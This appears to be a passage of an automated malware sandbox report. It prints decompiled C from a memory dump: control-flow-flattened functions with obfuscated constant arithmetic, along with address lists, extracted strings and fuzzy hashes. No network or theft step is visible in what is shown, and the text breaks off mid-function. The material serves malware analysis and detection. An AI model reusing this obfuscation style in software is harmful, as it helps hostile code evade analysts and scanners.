0x1000e13b
0x00000000

Strings

N, xrefs: 1000DDDA
D, xrefs: 1000E092
6, xrefs: 1000DE62
6gl, xrefs: 1000DF68
Xz, xrefs: 1000DF78
{ , xrefs: 1000DCFA

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID:
String ID: Xz$N$6gl$6$D${
API String ID: 0-312801833
Opcode ID: 43d1f337d2633616e0862327bcfaffe43d2006ec44e6a739fa4f7a5dec0ae303
Instruction ID: 8d001a2966ba5636cfab320129708333a48a2aec2ff4805fbe81f1fcfbe0fd68
Opcode Fuzzy Hash: 43d1f337d2633616e0862327bcfaffe43d2006ec44e6a739fa4f7a5dec0ae303
Instruction Fuzzy Hash: 62D10F711083819FD368CF60C58AA1FFBE1FBD4398F608A1DF29696260D3B58949CF42

Uniqueness

Uniqueness Score: -1.00%

Function 10013682, Relevance: 7.7, Strings: 6, Instructions: 246
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E10013682() {
				char _v520;
				char _v1040;
				signed int _v1044;
				signed int _v1048;
				signed int _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				void* _t267;
				void* _t268;
				signed int _t272;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				signed int _t276;
				signed int _t277;
				signed int _t278;
				signed int _t279;
				void* _t320;
				signed int* _t324;

				_t324 =  &_v1148;
				_v1132 = 0x5a7d7c;
				_v1132 = _v1132 + 0xa370;
				_v1132 = _v1132 * 0x35;
				_t320 = 0xece0556;
				_v1132 = _v1132 + 0xffff5242;
				_v1132 = _v1132 ^ 0x12dd36e4;
				_v1136 = 0x14ea8a;
				_v1136 = _v1136 >> 4;
				_v1136 = _v1136 << 9;
				_v1136 = _v1136 + 0x7d4e;
				_v1136 = _v1136 ^ 0x029a6218;
				_v1088 = 0x5be68d;
				_t272 = 0x73;
				_v1088 = _v1088 / _t272;
				_v1088 = _v1088 ^ 0x00085591;
				_v1120 = 0xf0337f;
				_t273 = 5;
				_v1120 = _v1120 * 0x70;
				_v1120 = _v1120 / _t273;
				_v1120 = _v1120 ^ 0x150f8bdc;
				_v1108 = 0xa6a0ed;
				_v1108 = _v1108 | 0x9698ac45;
				_t274 = 0x4e;
				_v1108 = _v1108 / _t274;
				_v1108 = _v1108 ^ 0x01ec575f;
				_v1060 = 0x1e3d07;
				_v1060 = _v1060 + 0xffff7f46;
				_v1060 = _v1060 ^ 0x001decf0;
				_v1068 = 0x59c0d1;
				_v1068 = _v1068 >> 1;
				_v1068 = _v1068 ^ 0x00213df3;
				_v1076 = 0xed06b6;
				_t275 = 0x3b;
				_v1076 = _v1076 / _t275;
				_v1076 = _v1076 ^ 0x000be048;
				_v1084 = 0xeea9a9;
				_v1084 = _v1084 | 0x707d57a1;
				_v1084 = _v1084 ^ 0x70ffa7ef;
				_v1096 = 0xf94e88;
				_v1096 = _v1096 + 0x9a75;
				_v1096 = _v1096 * 0x70;
				_v1096 = _v1096 ^ 0x6d5bdc6f;
				_v1104 = 0x77104f;
				_v1104 = _v1104 << 0xd;
				_v1104 = _v1104 << 3;
				_v1104 = _v1104 ^ 0x1044d122;
				_v1112 = 0xeb3398;
				_v1112 = _v1112 + 0x45eb;
				_v1112 = _v1112 >> 5;
				_v1112 = _v1112 ^ 0x00064d6a;
				_v1056 = 0x72dec8;
				_v1056 = _v1056 * 0x2d;
				_v1056 = _v1056 ^ 0x1436f450;
				_v1080 = 0xbc0c41;
				_v1080 = _v1080 << 7;
				_v1080 = _v1080 ^ 0x5e0c2e1e;
				_v1048 = 0xb50fd7;
				_t276 = 0x64;
				_v1048 = _v1048 * 0x1a;
				_v1048 = _v1048 ^ 0x126797d4;
				_v1092 = 0xf8a3f;
				_v1092 = _v1092 / _t276;
				_v1092 = _v1092 ^ 0x000be566;
				_v1140 = 0x4934c1;
				_v1140 = _v1140 ^ 0x883b3b28;
				_v1140 = _v1140 | 0xfa1fd754;
				_v1140 = _v1140 + 0x2dc9;
				_v1140 = _v1140 ^ 0xfa8f0382;
				_v1064 = 0x62e871;
				_t277 = 0x7d;
				_v1064 = _v1064 * 0x44;
				_v1064 = _v1064 ^ 0x1a4c863d;
				_v1044 = 0xaf612a;
				_v1044 = _v1044 >> 0xa;
				_v1044 = _v1044 ^ 0x000b0bbc;
				_v1116 = 0xc1ca72;
				_v1116 = _v1116 | 0xea59ecfc;
				_v1116 = _v1116 ^ 0xead1b502;
				_v1072 = 0xb83dfe;
				_v1072 = _v1072 << 0xb;
				_v1072 = _v1072 ^ 0xc1ec64ce;
				_v1124 = 0x84ab0c;
				_v1124 = _v1124 ^ 0x6e7d47b4;
				_v1124 = _v1124 + 0xffff7aa9;
				_v1124 = _v1124 ^ 0x6efe8ff1;
				_v1144 = 0x16fd2e;
				_v1144 = _v1144 << 0xe;
				_v1144 = _v1144 << 0xf;
				_v1144 = _v1144 / _t277;
				_v1144 = _v1144 ^ 0x018f7516;
				_v1148 = 0x7fc19f;
				_v1148 = _v1148 << 6;
				_t278 = 0x1c;
				_v1148 = _v1148 / _t278;
				_v1148 = _v1148 ^ 0xacaf82fa;
				_v1148 = _v1148 ^ 0xad851bba;
				_v1100 = 0x6a7343;
				_t182 =  &_v1100; // 0x6a7343
				_t279 = 0x48;
				_v1100 =  *_t182 / _t279;
				_v1100 = _v1100 | 0x5d27e979;
				_v1100 = _v1100 ^ 0x5d26c848;
				_v1052 = 0x8ad419;
				_v1052 = _v1052 * 0x6c;
				_v1052 = _v1052 ^ 0x3a93f9f9;
				_v1128 = 0x13fdea;
				_v1128 = _v1128 + 0xffff8e38;
				_v1128 = _v1128 + 0xffff6ba5;
				_v1128 = _v1128 + 0x68c7;
				_v1128 = _v1128 ^ 0x00113fa1;
				E1000B6B8();
				do {
					while(_t320 != 0x5bb7791) {
						if(_t320 == 0xb518bea) {
							_push(_v1108);
							_push(_v1120);
							_push(_v1088);
							E100049CE( *0x10025208 + 0x230,  *0x10025208 + 0x1c, E1000416C(_v1136, 0x100017d4), _v1060, _v1068, _v1136, _v1076, _v1084);
							_t267 = E1000B952(_v1096, _t265, _v1104, _v1112);
							_t324 =  &(_t324[0xc]);
							_t320 = 0xee29818;
							continue;
						} else {
							if(_t320 == 0xece0556) {
								_t320 = 0xb518bea;
								continue;
							} else {
								if(_t320 == 0xee29818) {
									_push(_v1092);
									_push(_v1048);
									_push(_v1080);
									_t268 = E1000416C(_v1056, 0x10001864);
									E1000AD89(_v1064, _v1044, _v1116, _v1072, E1000C0A4(),  &_v1040,  &_v1040, _t268,  *0x10025208 + 0x230, _v1124);
									_t267 = E1000B952(_v1144, _t268, _v1148, _v1100);
									_t324 =  &(_t324[0xe]);
									_t320 = 0x5bb7791;
									continue;
								}
							}
						}
						goto L9;
					}
					E1000D4EE( &_v520,  &_v1040, __eflags, _v1052, _v1128);
					_t320 = 0xe89afa4;
					L9:
					__eflags = _t320 - 0xe89afa4;
				} while (__eflags != 0);
				return _t267;
			}

0x10013682
0x10013688
0x10013692
0x100136a3
0x100136a7
0x100136ac
0x100136b4
0x100136bc
0x100136c4
0x100136c9
0x100136ce
0x100136d6
0x100136de
0x100136ec
0x100136f1
0x100136f7
0x100136ff
0x1001370c
0x1001370f
0x1001371b
0x1001371f
0x10013727
0x1001372f
0x1001373b
0x10013740
0x10013746
0x1001374e
0x10013756
0x1001375e
0x10013766
0x1001376e
0x10013772
0x1001377a
0x10013786
0x10013789
0x1001378d
0x10013795
0x1001379d
0x100137a5
0x100137ad
0x100137b5
0x100137c2
0x100137c6
0x100137ce
0x100137d6
0x100137db
0x100137e0
0x100137e8
0x100137f0
0x100137f8
0x100137fd
0x10013805
0x10013812
0x10013816
0x1001381e
0x10013826
0x1001382b
0x10013833
0x10013844
0x10013847
0x1001384b
0x10013853
0x10013863
0x10013867
0x1001386f
0x10013877
0x1001387f
0x10013887
0x1001388f
0x10013897
0x100138a4
0x100138a7
0x100138ab
0x100138b3
0x100138bb
0x100138c0
0x100138c8
0x100138d0
0x100138d8
0x100138e0
0x100138e8
0x100138ed
0x100138f5
0x100138fd
0x10013905
0x1001390d
0x10013915
0x1001391d
0x10013922
0x1001392f
0x10013933
0x1001393b
0x10013943
0x1001394c
0x10013951
0x10013957
0x1001395f
0x10013967
0x1001396f
0x10013973
0x10013976
0x1001397a
0x10013982
0x1001398a
0x10013997
0x1001399b
0x100139a3
0x100139ab
0x100139b3
0x100139bb
0x100139c3
0x100139cf
0x100139e3
0x100139e3
0x100139f1
0x10013a9a
0x10013aa3
0x10013aa7
0x10013ae2
0x10013af5
0x10013afa
0x10013afd
0x00000000
0x100139f7
0x100139fd
0x10013a93
0x00000000
0x10013a03
0x10013a05
0x10013a0b
0x10013a14
0x10013a18
0x10013a20
0x10013a6e
0x10013a81
0x10013a86
0x10013a89
0x00000000
0x10013a89
0x10013a05
0x100139fd
0x00000000
0x100139f1
0x10013b1a
0x10013b21
0x10013b23
0x10013b23
0x10013b23
0x10013b35

Strings

Csj, xrefs: 1001396F
qb, xrefs: 10013897
E, xrefs: 100137F0
y'], xrefs: 1001397A
N}, xrefs: 100136CE
|}Z, xrefs: 10013688

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID:
String ID: Csj$N}$qb$y']$|}Z$E
API String ID: 0-4293653076
Opcode ID: 8ebf74867de42bafc2bc6ba9bb2b5fb8c7282b34ed14dcc0cf97046187248927
Instruction ID: 458a0aa02a0616daf9eecc3db2ba9236ad507ab5ddb9a0c08084f60fe6be18c9
Opcode Fuzzy Hash: 8ebf74867de42bafc2bc6ba9bb2b5fb8c7282b34ed14dcc0cf97046187248927
Instruction Fuzzy Hash: C3C110B25093409FD358CF25C58A40FBBE2FBC4748F108A1DF5A69A260D7B69949CF46

Uniqueness

Uniqueness Score: -1.00%

Function 1001B278, Relevance: 7.7, Strings: 6, Instructions: 226
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E1001B278(void* __ecx) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				unsigned int _v64;
				signed int _v68;
				signed int _v72;
				unsigned int _v76;
				unsigned int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				void* _t224;
				void* _t228;
				void* _t235;
				void* _t239;
				void* _t241;
				void* _t245;
				void* _t246;
				signed int _t248;
				signed int _t249;
				signed int _t250;
				void* _t260;
				void* _t261;
				signed int* _t263;
				void* _t266;

				_t263 =  &_v92;
				_v24 = 0x81f945;
				_v24 = _v24 >> 0xa;
				_v24 = _v24 ^ 0x00039dbe;
				_v84 = 0x22cb63;
				_v84 = _v84 * 5;
				_t246 = __ecx;
				_v84 = _v84 << 7;
				_t260 = 0;
				_v84 = _v84 ^ 0xb6421e66;
				_t261 = 0x8f6e596;
				_v84 = _v84 ^ 0xe0bb58a7;
				_v88 = 0x659de6;
				_v88 = _v88 >> 0xd;
				_v88 = _v88 << 0xa;
				_v88 = _v88 << 0xe;
				_v88 = _v88 ^ 0x2c0f63b5;
				_v92 = 0x14258;
				_v92 = _v92 >> 3;
				_t248 = 6;
				_v92 = _v92 / _t248;
				_t249 = 0x51;
				_v92 = _v92 * 0x71;
				_v92 = _v92 ^ 0x00057128;
				_v64 = 0xeb6bca;
				_v64 = _v64 ^ 0xb8ce4e3e;
				_v64 = _v64 >> 6;
				_v64 = _v64 + 0xffffc8c8;
				_v64 = _v64 ^ 0x02e73096;
				_v36 = 0xa86b88;
				_v36 = _v36 * 9;
				_v36 = _v36 | 0x9f5a4552;
				_v36 = _v36 ^ 0x9ff93c36;
				_v68 = 0x63db52;
				_v68 = _v68 << 0x10;
				_v68 = _v68 * 0x35;
				_v68 = _v68 + 0xffffd1fe;
				_v68 = _v68 ^ 0x67f5241f;
				_v4 = 0xabd5a4;
				_v4 = _v4 << 0xc;
				_v4 = _v4 ^ 0xbd55b79e;
				_v8 = 0x17ce00;
				_v8 = _v8 << 6;
				_v8 = _v8 ^ 0x05f924c4;
				_v80 = 0xbf9803;
				_v80 = _v80 | 0x5fe0558f;
				_v80 = _v80 >> 0x10;
				_v80 = _v80 + 0x559;
				_v80 = _v80 ^ 0x0005c4b3;
				_v16 = 0x52ce0c;
				_v16 = _v16 * 0x6a;
				_v16 = _v16 ^ 0x224c5aae;
				_v52 = 0xaa2fc6;
				_v52 = _v52 + 0x75ec;
				_v52 = _v52 | 0xc861c9e9;
				_v52 = _v52 ^ 0xc8eeb544;
				_v20 = 0xac2407;
				_v20 = _v20 << 9;
				_v20 = _v20 ^ 0x58422a0d;
				_v44 = 0xf98edc;
				_v44 = _v44 << 0xa;
				_v44 = _v44 << 7;
				_v44 = _v44 ^ 0x1dbb13fa;
				_v12 = 0x63e14a;
				_v12 = _v12 / _t249;
				_v12 = _v12 ^ 0x0008137d;
				_v48 = 0x5fc25a;
				_v48 = _v48 ^ 0xac1ac619;
				_v48 = _v48 + 0x83f8;
				_v48 = _v48 ^ 0xac42703e;
				_v72 = 0xd448a3;
				_v72 = _v72 + 0x23af;
				_t250 = 0x7c;
				_v72 = _v72 * 0x39;
				_v72 = _v72 + 0xffffc305;
				_v72 = _v72 ^ 0x2f414323;
				_v40 = 0xa36fdc;
				_v40 = _v40 << 5;
				_v40 = _v40 * 0x4b;
				_v40 = _v40 ^ 0xfc32cca2;
				_v76 = 0xfbf120;
				_v76 = _v76 << 8;
				_v76 = _v76 | 0x0a1b1662;
				_v76 = _v76 >> 0xa;
				_v76 = _v76 ^ 0x0032e648;
				_v28 = 0x40e414;
				_v28 = _v28 * 5;
				_v28 = _v28 / _t250;
				_v28 = _v28 ^ 0x00000bca;
				_v56 = 0x77dc6e;
				_v56 = _v56 + 0x125b;
				_v56 = _v56 ^ 0x5261352e;
				_v56 = _v56 + 0x4d9c;
				_v56 = _v56 ^ 0x521c81c6;
				_v32 = 0x8df67b;
				_v32 = _v32 + 0xffff834c;
				_v32 = _v32 << 1;
				_v32 = _v32 ^ 0x011896e2;
				_v60 = 0x5a106f;
				_v60 = _v60 << 2;
				_v60 = _v60 + 0xffff5b42;
				_v60 = _v60 << 5;
				_v60 = _v60 ^ 0x2cf3886a;
				goto L1;
				do {
					while(1) {
						L1:
						_t266 = _t261 - 0x66aff13;
						if(_t266 > 0) {
							break;
						}
						if(_t266 == 0) {
							_push(_t250);
							_push(_t250);
							_t228 = E1000B8B0();
							_t263 =  &(_t263[2]);
							_t261 = 0x417f5db;
							_t260 = _t260 + _t228;
							continue;
						} else {
							if(_t261 == 0x772084) {
								_t260 = _t260 + E10004930(_v28, _v56, _v32, _v60, _t246 + 0x14);
							} else {
								if(_t261 == 0x2d466b9) {
									_push(_t250);
									_push(_t250);
									_t235 = E1000B8B0();
									_t263 =  &(_t263[2]);
									_t261 = 0xe504113;
									_t260 = _t260 + _t235;
									continue;
								} else {
									if(_t261 == 0x417f5db) {
										_push(_t250);
										_push(_t250);
										_t239 = E1000B8B0();
										_t263 =  &(_t263[2]);
										_t261 = 0x2d466b9;
										_t260 = _t260 + _t239;
										continue;
									} else {
										if(_t261 != 0x5936c3c) {
											goto L17;
										} else {
											_t250 = _v24;
											_t241 = E10004930(_t250, _v84, _v88, _v92, _t246 + 8);
											_t263 =  &(_t263[3]);
											_t261 = 0x7898ac0;
											_t260 = _t260 + _t241;
											continue;
										}
									}
								}
							}
						}
						L20:
						return _t260;
					}
					if(_t261 == 0x7898ac0) {
						_push(_t250);
						_push(_t250);
						_t224 = E1000B8B0();
						_t263 =  &(_t263[2]);
						_t261 = 0x66aff13;
						_t260 = _t260 + _t224;
						goto L17;
					} else {
						if(_t261 == 0x8f6e596) {
							_t261 = 0x5936c3c;
							goto L1;
						} else {
							if(_t261 != 0xe504113) {
								goto L17;
							} else {
								_push(_t250);
								_push(_t250);
								_t245 = E1000B8B0();
								_t263 =  &(_t263[2]);
								_t261 = 0x772084;
								_t260 = _t260 + _t245;
								goto L1;
							}
						}
					}
					goto L20;
					L17:
				} while (_t261 != 0xa464017);
				goto L20;
			}

0x1001b278
0x1001b27b
0x1001b285
0x1001b28a
0x1001b292
0x1001b2a3
0x1001b2a7
0x1001b2a9
0x1001b2ae
0x1001b2b0
0x1001b2b8
0x1001b2bd
0x1001b2c5
0x1001b2cd
0x1001b2d2
0x1001b2d7
0x1001b2dc
0x1001b2e4
0x1001b2ec
0x1001b2f7
0x1001b2fc
0x1001b307
0x1001b308
0x1001b30c
0x1001b314
0x1001b31c
0x1001b324
0x1001b329
0x1001b331
0x1001b339
0x1001b346
0x1001b34a
0x1001b352
0x1001b35a
0x1001b362
0x1001b36c
0x1001b370
0x1001b378
0x1001b380
0x1001b388
0x1001b38d
0x1001b395
0x1001b39d
0x1001b3a2
0x1001b3aa
0x1001b3b2
0x1001b3ba
0x1001b3bf
0x1001b3c7
0x1001b3cf
0x1001b3dc
0x1001b3e0
0x1001b3e8
0x1001b3f0
0x1001b3f8
0x1001b400
0x1001b408
0x1001b410
0x1001b415
0x1001b41d
0x1001b425
0x1001b42a
0x1001b42f
0x1001b437
0x1001b445
0x1001b449
0x1001b453
0x1001b460
0x1001b468
0x1001b470
0x1001b478
0x1001b480
0x1001b48f
0x1001b490
0x1001b494
0x1001b49c
0x1001b4a4
0x1001b4ac
0x1001b4b6
0x1001b4ba
0x1001b4c2
0x1001b4ca
0x1001b4cf
0x1001b4d7
0x1001b4dc
0x1001b4e4
0x1001b4f1
0x1001b4fb
0x1001b4ff
0x1001b507
0x1001b50f
0x1001b517
0x1001b51f
0x1001b527
0x1001b52f
0x1001b537
0x1001b53f
0x1001b543
0x1001b54b
0x1001b553
0x1001b558
0x1001b560
0x1001b565
0x1001b565
0x1001b56d
0x1001b56d
0x1001b56d
0x1001b56d
0x1001b56f
0x00000000
0x00000000
0x1001b575
0x1001b615
0x1001b616
0x1001b617
0x1001b61c
0x1001b61f
0x1001b624
0x00000000
0x1001b57b
0x1001b581
0x1001b6b3
0x1001b587
0x1001b58d
0x1001b5f3
0x1001b5f4
0x1001b5f5
0x1001b5fa
0x1001b5fd
0x1001b602
0x00000000
0x1001b58f
0x1001b595
0x1001b5d4
0x1001b5d5
0x1001b5d6
0x1001b5db
0x1001b5de
0x1001b5e3
0x00000000
0x1001b597
0x1001b59d
0x00000000
0x1001b5a3
0x1001b5b3
0x1001b5b7
0x1001b5bc
0x1001b5bf
0x1001b5c4
0x00000000
0x1001b5c4
0x1001b59d
0x1001b595
0x1001b58d
0x1001b581
0x1001b6b5
0x1001b6be
0x1001b6be
0x1001b631
0x1001b67b
0x1001b67c
0x1001b67d
0x1001b682
0x1001b685
0x1001b687
0x00000000
0x1001b633
0x1001b639
0x1001b665
0x00000000
0x1001b63b
0x1001b641
0x00000000
0x1001b643
0x1001b64f
0x1001b650
0x1001b651
0x1001b656
0x1001b659
0x1001b65e
0x00000000
0x1001b65e
0x1001b641
0x1001b639
0x00000000
0x1001b689
0x1001b689
0x00000000

Strings

H2, xrefs: 1001B4DC
u, xrefs: 1001B3F0
.5aR, xrefs: 1001B517
*BX, xrefs: 1001B5C8
Jc, xrefs: 1001B437
#CA/, xrefs: 1001B49C

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID:
String ID: *BX$#CA/$.5aR$H2$Jc$u
API String ID: 0-1896692660
Opcode ID: 9d864d8ba234a7f8863149e87aaa24b71efc06a218533c6ba0f92ad8ce81876e
Instruction ID: a5aac7933a57e7ac608d54475ea085e81f185b60a050d513bde15c4b3827c65e
Opcode Fuzzy Hash: 9d864d8ba234a7f8863149e87aaa24b71efc06a218533c6ba0f92ad8ce81876e
Instruction Fuzzy Hash: 49B11FB68083409FC354CF29D58A40BFBF1FB95798F504A2DF5999A220D3B5DA48CF92

Uniqueness

Uniqueness Score: -1.00%

Function 1001C962, Relevance: 7.7, Strings: 6, Instructions: 191
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E1001C962(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v4;
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				void* _t184;
				signed int _t202;
				void* _t206;
				void* _t209;
				void* _t224;
				signed int _t225;
				signed int _t226;
				signed int _t227;
				signed int _t228;
				signed int* _t232;

				_t207 = _a4;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E100167B8(_t184);
				_v16 = 0x5cb73c;
				_t232 =  &(( &_v92)[6]);
				_v12 = 0x9acf8a;
				_t224 = 0;
				_v8 = _v8 & 0;
				_v4 = _v4 & 0;
				_t209 = 0x49217ca;
				_v24 = 0x8b5674;
				_t225 = 0x7b;
				_v24 = _v24 / _t225;
				_v24 = _v24 ^ 0x00012202;
				_v72 = 0x50bb41;
				_v72 = _v72 | 0xf53eabfe;
				_v72 = _v72 * 0x6a;
				_v72 = _v72 << 8;
				_v72 = _v72 ^ 0x79d79610;
				_v84 = 0x93bc00;
				_v84 = _v84 << 0x10;
				_v84 = _v84 + 0xec31;
				_v84 = _v84 * 0x43;
				_v84 = _v84 ^ 0x743dd0d3;
				_v76 = 0x42e52e;
				_v76 = _v76 + 0xffff39f0;
				_v76 = _v76 >> 6;
				_v76 = _v76 << 4;
				_v76 = _v76 ^ 0x0018d1e9;
				_v28 = 0x36b12b;
				_v28 = _v28 * 0x12;
				_v28 = _v28 ^ 0x03d1ec04;
				_v80 = 0xffa40d;
				_v80 = _v80 + 0xed7f;
				_v80 = _v80 ^ 0xbad7cba3;
				_v80 = _v80 << 0x10;
				_v80 = _v80 ^ 0x5a2d74af;
				_v48 = 0xf67f57;
				_v48 = _v48 ^ 0x8fcd60c7;
				_v48 = _v48 ^ 0x43d1911e;
				_v48 = _v48 ^ 0xccec84d4;
				_v32 = 0xe8987c;
				_v32 = _v32 << 9;
				_v32 = _v32 ^ 0xd1356279;
				_v52 = 0xc94dc5;
				_v52 = _v52 * 0x43;
				_v52 = _v52 + 0xffff4675;
				_v52 = _v52 ^ 0x34ac9f68;
				_v36 = 0x568629;
				_v36 = _v36 ^ 0x477a2a30;
				_v36 = _v36 ^ 0x472bddcf;
				_v56 = 0x532b82;
				_v56 = _v56 * 9;
				_v56 = _v56 | 0xec2891f0;
				_v56 = _v56 ^ 0xeee3e19f;
				_v88 = 0x44272c;
				_v88 = _v88 | 0x3fcfbbfd;
				_v88 = _v88 * 0x1c;
				_v88 = _v88 ^ 0xfab4051e;
				_v92 = 0x3e680c;
				_v92 = _v92 + 0xffff22e5;
				_v92 = _v92 + 0xb5b1;
				_v92 = _v92 + 0xfffff6d3;
				_v92 = _v92 ^ 0x00398152;
				_v40 = 0x14beef;
				_v40 = _v40 | 0x0135115c;
				_v40 = _v40 ^ 0x0133f494;
				_v60 = 0x38b6ec;
				_v60 = _v60 + 0xffff8979;
				_t226 = 0x15;
				_v60 = _v60 / _t226;
				_v60 = _v60 ^ 0x000e4509;
				_v20 = 0x21712d;
				_v20 = _v20 + 0xc166;
				_v20 = _v20 ^ 0x00287b9d;
				_v64 = 0xa54b2d;
				_v64 = _v64 + 0xffffc0ab;
				_v64 = _v64 + 0xffff86b8;
				_v64 = _v64 + 0x8aa;
				_v64 = _v64 ^ 0x00a8d437;
				_v44 = 0x5028e3;
				_v44 = _v44 ^ 0x1dd9f8c2;
				_t227 = 3;
				_v44 = _v44 * 0x66;
				_v44 = _v44 ^ 0xc4e3971d;
				_v68 = 0xae68e8;
				_v68 = _v68 * 0x6e;
				_v68 = _v68 / _t227;
				_t228 = 0x6b;
				_t229 = _v20;
				_v68 = _v68 / _t228;
				_v68 = _v68 ^ 0x003fda76;
				do {
					while(_t209 != 0x18b494c) {
						if(_t209 == 0x49217ca) {
							_t209 = 0x18b494c;
							continue;
						} else {
							if(_t209 == 0x7453e6d) {
								E100074B2(_v20, _v64, _v44, _t229, _v68);
							} else {
								if(_t209 != 0xeebecd8) {
									goto L10;
								} else {
									_t206 = E1001F7C5(_v56,  *_t207, _t207 + 4,  *((intOrPtr*)(_t207 + 4)), _t209, _v92, _v40, _t229, _v60);
									_t232 =  &(_t232[8]);
									_t224 = _t206;
									_t209 = 0x7453e6d;
									continue;
								}
							}
						}
						L13:
						return _t224;
					}
					_t202 = E1001CCFE(_v72, _v76, _v24, _v28, _v80, _v84, _v48, _a16, _v32, _v52, _t209, _v36, 0);
					_t229 = _t202;
					_t232 =  &(_t232[0xc]);
					if(_t202 == 0xffffffff) {
						_t209 = 0xf975ff5;
						goto L10;
					} else {
						_t209 = 0xeebecd8;
						continue;
					}
					goto L13;
					L10:
				} while (_t209 != 0xf975ff5);
				goto L13;
			}

0x1001c966
0x1001c96d
0x1001c971
0x1001c975
0x1001c979
0x1001c97b
0x1001c97c
0x1001c981
0x1001c989
0x1001c98c
0x1001c994
0x1001c996
0x1001c99c
0x1001c9a0
0x1001c9a5
0x1001c9b3
0x1001c9b6
0x1001c9ba
0x1001c9c2
0x1001c9ca
0x1001c9d7
0x1001c9db
0x1001c9e0
0x1001c9e8
0x1001c9f0
0x1001c9f5
0x1001ca02
0x1001ca06
0x1001ca0e
0x1001ca16
0x1001ca1e
0x1001ca23
0x1001ca28
0x1001ca30
0x1001ca3d
0x1001ca41
0x1001ca49
0x1001ca51
0x1001ca59
0x1001ca61
0x1001ca66
0x1001ca6e
0x1001ca76
0x1001ca7e
0x1001ca86
0x1001ca8e
0x1001ca96
0x1001ca9b
0x1001caa3
0x1001cab0
0x1001cab4
0x1001cabc
0x1001cac4
0x1001cacc
0x1001cad4
0x1001cadc
0x1001cae9
0x1001caed
0x1001caf5
0x1001cafd
0x1001cb05
0x1001cb12
0x1001cb16
0x1001cb1e
0x1001cb26
0x1001cb2e
0x1001cb36
0x1001cb40
0x1001cb4d
0x1001cb55
0x1001cb5d
0x1001cb65
0x1001cb6d
0x1001cb7b
0x1001cb80
0x1001cb86
0x1001cb8e
0x1001cb96
0x1001cb9e
0x1001cba6
0x1001cbae
0x1001cbb6
0x1001cbbe
0x1001cbc6
0x1001cbce
0x1001cbd6
0x1001cbe3
0x1001cbe6
0x1001cbea
0x1001cbf2
0x1001cbff
0x1001cc0b
0x1001cc13
0x1001cc16
0x1001cc1a
0x1001cc1e
0x1001cc26
0x1001cc26
0x1001cc30
0x1001cc79
0x00000000
0x1001cc32
0x1001cc38
0x1001ccec
0x1001cc3e
0x1001cc44
0x00000000
0x1001cc4a
0x1001cc68
0x1001cc6d
0x1001cc70
0x1001cc72
0x00000000
0x1001cc72
0x1001cc44
0x1001cc38
0x1001ccf4
0x1001ccfd
0x1001ccfd
0x1001ccaf
0x1001ccb4
0x1001ccb6
0x1001ccbc
0x1001ccc8
0x00000000
0x1001ccbe
0x1001ccbe
0x00000000
0x1001ccbe
0x00000000
0x1001cccd
0x1001cccd
0x00000000

Strings

(P, xrefs: 1001CBCE
1, xrefs: 1001C9F5
-q!, xrefs: 1001CB8E
0*zG, xrefs: 1001CACC
.B, xrefs: 1001CA0E
,'D, xrefs: 1001CAFD

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID:
String ID: ,'D$-q!$.B$0*zG$1$(P
API String ID: 0-2829844183
Opcode ID: 8355fc6bd97dc12a54df41659a00be0f4276931ea119b13bce9d88d2e6b72df7
Instruction ID: 0f57680893e2609e591a85f92c4dc32ab1135d8327588597443477dccb9e3d05
Opcode Fuzzy Hash: 8355fc6bd97dc12a54df41659a00be0f4276931ea119b13bce9d88d2e6b72df7
Instruction Fuzzy Hash: 8C91F0B2409341AFD394CF65C98A91BFBF1FBC4758F405A0DF6959A260D3B1CA498F82

Uniqueness

Uniqueness Score: -1.00%

Function 10020588, Relevance: 7.6, Strings: 6, Instructions: 77
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E10020588() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int _t98;
				signed int _t99;
				signed int _t100;
				signed int _t101;

				_v40 = _v40 & 0x00000000;
				_v44 = 0x926fb7;
				_v20 = 0xbe2f68;
				_v20 = _v20 >> 9;
				_v20 = _v20 | 0x2462f784;
				_v20 = _v20 ^ 0x24662ceb;
				_v16 = 0xa4c74;
				_v16 = _v16 >> 0xc;
				_v16 = _v16 << 0xe;
				_v16 = _v16 ^ 0x0021b14e;
				_v12 = 0x452859;
				_v12 = _v12 | 0x062cf895;
				_v12 = _v12 + 0xffff7e70;
				_v12 = _v12 ^ 0x0664fd4e;
				_v8 = 0x2e7169;
				_t98 = 0xa;
